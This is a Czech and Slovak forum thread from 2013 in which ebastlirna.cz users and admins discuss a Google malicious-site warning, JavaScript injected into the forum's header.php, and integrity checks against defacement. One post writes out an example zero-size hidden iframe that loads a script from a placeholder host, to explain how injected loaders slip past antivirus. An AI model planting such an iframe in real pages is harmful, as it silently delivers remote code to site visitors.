Hlášení EB - škodliva/útočná stránka?

Zpráva

procesor · #1 Příspěvek od **procesor** » 16 zář 2013, 23:53

Čo s tým...

#2 Příspěvek od **MetalGod** » 17 zář 2013, 01:06

Že by se sem někdo zase nabořil? No, mně, co by linuxákovi, to žíly fakt nerve. Ale kouknu na kód.

Hydrawerk · #3 Příspěvek od **Hydrawerk** » 17 zář 2013, 01:21

http://www.ebastlirna.cz/modules.php?na ... &start=240

helios · #4 Příspěvek od **helios** » 17 zář 2013, 02:17

Na mňa to pred chvíľou tiež vyskočilo...

ZVUK2000 · #5 Příspěvek od **ZVUK2000** » 17 zář 2013, 05:45

Já se ted mohu přihlásit jedině pomoci SZ. Jinak to hlásí škodlivá stránka

#6 Příspěvek od **Hill** » 17 zář 2013, 05:57

Vypadá to, že Google změnil stupeň důvěryhodnosti, takže vyžaduje snížit stupeň ochrany našich prohlížečů vypnutím blokování nahlášených útočných stránek.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.

#7 Příspěvek od **alovka** » 17 zář 2013, 06:48

Minulý týden jsem odstraòoval škodlivý kód, který byl nìkým pøidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nìjaký javascript, který se automaticky spouštìl v prohlížeèi pøi rozjetí stránky. Antiviry to bìžnì zachytili.

galjo · #8 Příspěvek od **galjo** » 17 zář 2013, 08:44

To je pravda - ja mám na stránke , kde chodí max 5 ludí tiež momentálne vyhodené - blokovaná stránka - Dôvod: Bola detekovaná hrozba (JS.IFrame.425)
a v navštevách stránky mám takéto niečo.... google-proxy-66-249-83-7.google.com - 20 návštev v priebehu týždňa.

#9 Příspěvek od **ZdenekHQ** » 17 zář 2013, 13:11

Protože odkaz na případný vir vede ze stránek EB, blokl paranoidní Google celou EB a spustil lavinu. Poslal jsem žádost o odstranění varování, s jejich rychlostí je to tak na týden.

Počet možných zjištěných útoků : 2

Jim je úplně jedno, koho a jak poškodí.

A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?

Nejspíš je Google sám adept na BAN.

V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.

Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš.

#10 Příspěvek od **rnbw** » 17 zář 2013, 13:22

Google takto predsa "chrani" pouzivatelov. Nechava si z browseru (Firefox) posielat kazde URL a ak je na blackliste, tak browser zobrazi varovanie. Je to akoze pre dobro pouzivatelov. A Google len tak mimochodom sleduje, kto kam chodi a moze zablokovat lubovolny web...

#11 Příspěvek od **MetalGod** » 17 zář 2013, 13:45

alovka píše:Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.

Tak to bych udělal zálohu statických objektů, jejich kontrolní součty, ty pak periodicky kontroloval, a při neshodě nahradil modifikovaný soubory souborama ze zálohy, a přidaný soubory smazal. Tohle by měl umět třeba rsync. Změny by se pak měly provádět na stroji, kde je záloha.
Pokud někdo pozmění statickej obsah fóra, pak, když se bude kontrola provádět každou půlhodinu, útočníkův projev bude mít životnost při obrovský dávce štěstí právě onu hodinu.

#12 Příspěvek od **ZdenekHQ** » 17 zář 2013, 13:53

Blbý je, že já jsem to už několikrát v minulých dnech kontroloval a vir veškerý žádný. Jestli byl i na EB a Alovka ho smázal, pak jsem to přehlédl, neboť už delší dobu řeším jednu stále více blbnoucí ženskou na hraně těžké závislosti na PC hrách versus jedno malé dítě, což je v podstatě každodenní problém, který se stále zhoršuje.

Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthre ... readid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná.

#13 Příspěvek od **MetalGod** » 17 zář 2013, 14:01

Tam žádnej virus bejt nemusí, bylo by to moc okatý, stačí neškodnej JS, kterej si škodlivej kód stáhne odjinud. Nebo blbej iframe, okno do jinýho serveru. Vždyť co by měl vidět antivirák na tom, že kdesi v kódu fóra přibyl řádek viz dole?
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe>

#14 Příspěvek od **ZdenekHQ** » 17 zář 2013, 14:47

Pro mě je na EB virus jakýkoliv js kód, co neznám.

A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.

Kdoví, jak se to všechno v Google poskládalo do sebe.

#15 Příspěvek od **alovka** » 17 zář 2013, 15:31

Ten škodlivý kód byl pøímo v header.php a ještì v jednom skriptu, který se vkládá (include) do fóra. Mrknul jsem na datumy zmìny souborù a šlo to najít hned. Byl tam pøímo nakopírovaný jeho celý zdrojový kód asi 3kB.